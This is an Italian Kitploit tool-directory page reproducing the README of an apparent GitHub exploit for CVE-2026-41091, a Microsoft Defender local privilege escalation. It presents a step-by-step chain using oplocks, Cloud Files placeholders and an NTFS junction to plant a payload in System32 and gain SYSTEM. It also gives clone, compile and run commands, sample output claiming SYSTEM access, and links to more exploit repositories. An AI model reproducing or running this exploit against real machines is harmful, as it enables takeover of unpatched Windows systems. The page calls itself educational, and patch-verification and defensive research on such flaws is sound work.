Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41091-PoC-Exploit — CVE-2026-41091 RedSun | Exploit LPE di Microsoft Defender. Utenti con privilegi ridotti ottengono NT AUTHORITY\SYSTEM 🔥 tramite API Cloud Files + trucco junction NTFS. Costringe Defender a scrivere payload dannosi in System32 con diritti SYSTEM. ⚠️ Attivamente sfruttato in natura. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. 🛡️ Solo PoC educativo. | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-41091-poc-exploit
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHubtc4dy/cve-2026-41091-poc-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

CVE-2026-41091-PoC-Exploit

Vedi Repository
31 mese faNon ancora revisionato

CVE-2026-41091 RedSun | Exploit LPE di Microsoft Defender. Utenti con privilegi ridotti ottengono NT AUTHORITY\SYSTEM 🔥 tramite API Cloud Files + trucco junction NTFS. Costringe Defender a scrivere payload dannosi in System32 con diritti SYSTEM. ⚠️ Attivamente sfruttato in natura. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. 🛡️ Solo PoC educativo.

Condividi

SolarFlare

☀️ CVE-2026-41091 - RedSun (SolarFlare) - Exploit LPE per Microsoft Defender

C++ Windows License CVSS CISA KEV

Vulnerabilità di Link Following in Microsoft Defender - Escalation di privilegi locali a NT AUTHORITY\SYSTEM

La vulnerabilità è nota come "RedSun" 🎯, "SolarFlare" è il nome che ho dato al mio exploit. ✅

📌 Panoramica

Questo repository contiene un Proof of Concept (PoC) funzionante completo per CVE-2026-41091, una vulnerabilità critica di escalation di privilegi locali in Microsoft Defender (Microsoft Malware Protection Engine). Sfruttando una risoluzione impropria dei link (CWE-59), un utente malintenzionato autenticato con bassi privilegi può ottenere privilegi NT AUTHORITY\SYSTEM.

La vulnerabilità, nota anche come "RedSun" o "SolarFlare", consente agli aggressori di ingannare Microsoft Defender per scrivere file arbitrari in posizioni di sistema protette con privilegi SYSTEM utilizzando l'API Cloud Files (CfAPI) e i punti di giunzione NTFS.

Nota: Questo repository include due versioni:

  • basic_poc.cpp - Dimostrazione semplificata dell'algoritmo (didattica)
  • full_poc.cpp - Exploit completo funzionante con tutte le funzionalità

🔥 Caratteristiche principali

🎯 Dettagli della vulnerabilità

📦 Prodotti interessati

ProdottoVersioni affetteVersioni corrette
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

🔬 Catena di sfruttamento

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│ CATENA DI SFRUTTAMENTO SOLARFLARE                                          │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│ 1. Crea directory di lavoro                                                 │
│    └─> %TEMP%\SF-XXXX\                                                      │
│                                                                              │
│ 2. Attiva Defender con EICAR                                                │
│    └─> Scrivi EICAR rovesciato nel file esca                                │
│                                                                              │
│ 3. Attendi snapshot VSS                                                     │
│    └─> Rileva creazione di Volume Shadow Copy                               │
│                                                                              │
│ 4. Crea primo Batch Oplock                                                  │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK sul file esca                             │
│                                                                              │
│ 5. Attendi rottura Oplock                                                   │
│    └─> Ottieni accesso esclusivo                                            │
│                                                                              │
│ 6. Rinomina directory                                                       │
│    └─> Sposta directory originale in .tmp                                   │
│                                                                              │
│ 7. Registra radice di sincronizzazione cloud                                │
│    └─> CfRegisterSyncRoot con API Cloud Files                               │
│                                                                              │
│ 8. Crea segnaposto cloud                                                    │
│    └─> CfCreatePlaceholders per il file esca                                │
│                                                                              │
│ 9. Crea secondo Batch Oplock                                                │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK sul segnaposto cloud                      │
│                                                                              │
│ 10. Attendi seconda rottura Oplock                                          │
│     └─> Ottieni accesso esclusivo                                           │
│                                                                              │
│ 11. Rinomina directory cloud                                                │
│     └─> Sposta directory cloud in .cloud.tmp                                │
│                                                                              │
│ 12. Crea giunzione NTFS verso System32                                      │
│     └─> Reindirizza a C:\Windows\System32                                   │
│                                                                              │
│ 13. Copia payload in System32                                               │
│     └─> Copia file esca in System32 come TieringEngineService.exe           │
│                                                                              │
│ 14. Attiva servizio come SYSTEM                                             │
│     └─> CoCreateInstance(StorageTiersManagement)                            │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

📦 Installazione

Prerequisiti

  • Windows 10/11 o Windows Server 2019/2022
  • Visual Studio 2019/2022 con strumenti C++
  • Privilegi amministrativi (per l'esecuzione)

Compilazione

root@kitploit:~
# Clona il repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Compila usando il Prompt dei comandi per sviluppatori di Visual Studio
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Oppure compila la versione base
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

🛠️ Utilizzo

Exploit completo (Escalation di privilegi a SYSTEM)

root@kitploit:~
full_poc.exe

Dimostrazione semplice dell'algoritmo

root@kitploit:~
basic_poc.exe

📋 Esempio di output

Output dell'exploit completo

root@kitploit:~
CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] Exploit SolarFlare avviato.
[*] Creazione directory di lavoro...
[+] Directory creata: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Attivazione Defender con EICAR...
[+] Defender attivato
[*] Attesa snapshot VSS...
[+] Snapshot VSS rilevato
[*] Creazione primo oplock...
[+] Primo oplock creato
[*] Attesa rottura oplock...
[+] Oplock acquisito
[*] Rinominazione directory...
[+] Directory rinominata
[*] Creazione secondo oplock...
[+] Secondo oplock creato
[*] Attesa secondo oplock...
[+] Secondo oplock acquisito
[*] Rinominazione directory cloud...
[+] Directory cloud rinominata
[*] Creazione giunzione NTFS verso System32...
[+] Giunzione creata
[*] Attesa che Defender finisca...
[*] Copia payload in System32...
[+] Payload copiato in C:\Windows\System32\TieringEngineService.exe
[*] Attivazione servizio Storage Tiers Management...
[+] Servizio attivato come SYSTEM

[+] Accesso SYSTEM ottenuto!

Output PoC base

root@kitploit:~
CVE-2026-41091 Basic PoC
========================================
  Solo dimostrazione algoritmo
========================================
[*] Avvio algoritmo exploit...
[*] Creazione directory di lavoro...
[+] Directory creata: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Attivazione Defender con EICAR...
[+] Defender attivato
[*] Attesa snapshot VSS...
[+] VSS rilevato
[*] Creazione primo oplock...
[+] Primo oplock creato
[*] Attesa rottura oplock...
[+] Oplock acquisito
[*] Rinominazione directory...
[+] Directory rinominata
[*] Creazione secondo oplock...
[+] Secondo oplock creato
[*] Attesa secondo oplock...
[+] Secondo oplock acquisito
[*] Creazione giunzione NTFS verso System32...
[+] Giunzione creata
[*] Attesa che Defender finisca...
[*] Copia payload in System32...
[+] Payload copiato in C:\Windows\System32\Payload.exe

[+] Dimostrazione algoritmo completata!
[i] Questo è solo l'algoritmo base.
[i] Per l'escalation completa a SYSTEM,
[i] usare full_poc.cpp con Cloud API e attivazione COM.

🔧 Istruzioni di compilazione

Utilizzo di Visual Studio

  1. Aprire il Prompt dei comandi per sviluppatori per VS 2022
  2. Navigare nella directory dell'exploit
  3. Eseguire:
root@kitploit:~
# Exploit completo
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# PoC base
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

Utilizzo di CMake

root@kitploit:~
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

⚠️ Requisiti e limitazioni

🔗 Exploit correlati

Dai un'occhiata agli altri miei repository di exploit:

  • CVE-2026-24061-PoC-Exploit - Bypass autenticazione GNU inetutils-telnetd
  • CVE-2026-41940-PoC-Exploit - Bypass autenticazione cPanel/WHM
  • CVE-2026-0073-PoC-Exploit - Bypass autenticazione debug wireless ADB Android
Scarica lo strumento
CategoriaFunzionalità
Sfruttamento✅ Escalation di privilegi locali a SYSTEM
✅ Integrazione con Cloud Files API (CfAPI)
✅ Creazione di segnaposto cloud
✅ Reindirizzamento tramite giunzione NTFS
Tecniche✅ Abuso di Batch Oplock
✅ Rilevamento snapshot VSS
✅ Trigger EICAR
✅ Attivazione servizio COM
Target✅ Microsoft Defender < 1.1.26040.8
✅ Windows 10/11
✅ Windows Server 2019/2022
Usabilità✅ Logging dettagliato
✅ Gestione errori
✅ Nomi di directory casuali
✅ Pulizia automatica
AttributoValore
ID CVECVE-2026-41091
Punteggio CVSS7.8 (Alto)
Vettore CVSSAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Vettore d'attaccoLocale
Privilegi richiestiBassi
Interazione utenteNessuna
ImpattoEsecuzione di codice a livello SYSTEM
CISA KEV✅ Sì (sfruttato attivamente in natura)
Patch disponibileMicrosoft Malware Protection Engine 1.1.26040.8
RequisitoDettagli
SOWindows 10/11, Server 2019/2022
PrivilegiAmministrativi (per l'esecuzione)
DefenderMicrosoft Defender deve essere abilitato
InternetNecessario per il rilevamento snapshot VSS
PatchFunziona solo su sistemi non aggiornati
ArchitetturaSolo x64